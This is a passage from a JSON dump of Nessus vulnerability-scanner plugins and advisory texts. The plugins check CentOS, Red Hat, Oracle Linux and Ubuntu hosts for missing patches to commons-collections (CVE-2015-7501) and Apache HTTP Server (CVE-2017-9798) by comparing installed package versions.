script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"CentOS 6 : jakarta-commons-collections (CESA-2015:2521)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-December/021512.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd1e83b8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:53", "description": "Updated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-03T00:00:00", "type": "nessus", "title": "RHEL 7 : apache-commons-collections (RHSA-2015:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework-javadoc", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2522. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87179);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"RHEL 7 : apache-commons-collections (RHSA-2015:2522)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2522\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2522\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:15", "description": "From Red Hat Security Advisory 2015:2521 :\n\nUpdated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : jakarta-commons-collections (ELSA-2015-2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:jakarta-commons-collections", "p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2521 and \n# Oracle Linux Security Advisory ELSA-2015-2521 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87118);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"Oracle Linux 6 : jakarta-commons-collections (ELSA-2015-2521)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2521 :\n\nUpdated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005595.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:00:35", "description": "Hanno Bock discovered that the Apache HTTP Server incorrectly handled Limit directives in .htaccess files. In certain configurations, a remote attacker could possibly use this issue to read arbitrary server memory, including sensitive information. This issue is known as Optionsbleed.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : Apache HTTP Server vulnerability (USN-3425-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-bin", "p-cpe:/a:canonical:ubuntu_linux:apache2-data", "p-cpe:/a:canonical:ubuntu_linux:apache2-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-event", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker", "p-cpe:/a:canonical:ubuntu_linux:apache2-suexec", "p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-custom", "p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-pristine", "p-cpe:/a:canonical:ubuntu_linux:apache2-utils", "p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-macro", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-proxy-html", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:apache2"], "id": "UBUNTU_USN-3425-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3425-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103356);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"USN\", value:\"3425-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : Apache HTTP Server vulnerability (USN-3425-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Hanno Bock discovered that the Apache HTTP Server incorrectly handled\nLimit directives in .htaccess files. In certain configurations, a\nremote attacker could possibly use this issue to read arbitrary server\nmemory, including sensitive information. This issue is known as\nOptionsbleed.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3425-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-custom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-pristine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-macro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-proxy-html\");\n script_set_attribute(attribute:\"cpe\", 